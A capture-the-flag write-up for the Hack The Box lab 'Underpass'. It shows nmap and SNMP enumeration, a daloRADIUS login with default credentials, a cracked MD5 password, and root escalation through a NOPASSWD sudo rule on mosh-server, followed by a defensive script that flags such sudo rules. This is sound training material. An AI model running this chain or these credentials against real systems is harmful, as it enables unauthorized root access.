Easy
Underpass [20 pts]
Challenge Description
Points: 20 | Solves: 5484
- network enumeration and SNMP information gathering reveal an HTTP service running daloRADIUS with default credentials
- credentials extracted from daloRADIUS allow further system access
- exploiting a misconfigured mosh server grants root access
Enumeration
We begin with an nmap scan, identifying two open TCP ports:
kali@kali:~/HTB/underpass $ nmap -sC -sV -oA nmap/underpass 10.10.11.48
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
The HTTP server was unresponsive, so we turned our attention to scanning UDP ports. Given the potential delay in full scans, we opted for the top 100 most common UDP ports:
kali@kali:~/HTB/underpass $ nmap -sU --top-ports 100 10.10.11.48
PORT STATE SERVICE
161/udp open snmp
1812/udp open|filtered radius
1813/udp open|filtered radacct
SNMP Information Gathering
The SNMP service was accessible, so we initiated a basic snmpwalk to enumerate available information:
snmpwalk -c public -v1 10.10.11.48 1 > snmpwalk.txt
The output revealed a wealth of details, including the hostname and a reference to UnDerPass.htb being a daloRADIUS server:
SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
HTTP Enumeration
Assuming the HTTP server might host the daloRADIUS service, we navigated to http://underpass.htb/daloradius/ (after updating /etc/hosts). Directory enumeration revealed the following structure:
.gitignore [Status: 200]
app/ [Status: 301]
app/operators/ [Status: 301]
app/operators/login.php [Status: 200]
...
Default credentials (administrator/radius) worked for operators/login.php, providing access to the daloRADIUS dashboard.
Credential Discovery
In the dashboard, under the Management tab, we listed all users and discovered a user named svcMosh with the following credentials:
- Username: svcMosh
- Password (MD5 hash): 412DD4759978ACFCC81DEAB01B382403
Using CrackStation, we identified the password as underwaterfriends. With these credentials, we successfully SSH'd into the box.
Privilege Escalation
Examining sudo permissions for svcMosh revealed a direct path to escalate privileges:
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server
Mosh essentially creates another shell on the remote computer, so if we start mosh-server as root and connect to it, we can read the root flag. First we need to start the server:
svcMosh@underpass:~$ sudo /usr/bin/mosh-server
MOSH CONNECT 60002 /jTnrhTD4TnUg45eSJcNiA
mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
[mosh-server detached, pid = 1998]
Following the Mosh documentation, we set MOSH_KEY and used the mosh-client command to connect to the shell:
MOSH_KEY=/jTnrhTD4TnUg45eSJcNiA mosh-client 127.0.0.1 60002
Upon connection, we obtained root access and retrieved the root flag.
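A defender-side check for the sudo rule abused above, as an added example that is not part of the original write-up: it parses `sudo -l` output and flags rules that let a user run a shell-granting program as root. The sample input is constructed (only the mosh-server rule comes from this page), and the `SHELL_GRANTING` list is an assumed, non-exhaustive illustration.

```python
import re

# Constructed sample of `sudo -l` output; only the mosh-server rule is from the write-up.
SAMPLE_SUDO_L = """\
User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
    (root) /usr/bin/systemctl status nginx
    (www-data) NOPASSWD: /usr/bin/mosh-server
"""

# Assumed, non-exhaustive list of programs that hand the caller an interactive shell.
SHELL_GRANTING = {"mosh-server", "bash", "sh", "zsh", "su"}

# "(runas) TAG: TAG: command[, command...]" as printed by `sudo -l`.
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def parse_rules(sudo_l_output):
    """Yield (runas_users, tags, command) for every rule line of `sudo -l` output."""
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header lines such as "User ... may run ..."
        # "(user : group)" -> keep only the user list before the colon.
        runas = {u.strip() for u in m["runas"].split(":")[0].split(",")}
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(", "):
            if cmd.strip():
                yield runas, tags, cmd.strip()

def risky_rules(sudo_l_output):
    """Return (severity, command) for rules that are effectively root-equivalent."""
    findings = []
    for runas, tags, cmd in parse_rules(sudo_l_output):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        as_root = bool(runas & {"ALL", "root"})
        if as_root and (binary in SHELL_GRANTING or cmd == "ALL"):
            # NOPASSWD removes the last barrier: no password re-entry is needed.
            severity = "critical" if "NOPASSWD" in tags else "high"
            findings.append((severity, cmd))
    return findings

if __name__ == "__main__":
    for severity, cmd in risky_rules(SAMPLE_SUDO_L):
        print(f"[{severity}] root-equivalent sudo rule: {cmd}")
```

Any finding should be treated as a grant of full root: remove the rule, or restrict the run-as user to an unprivileged account.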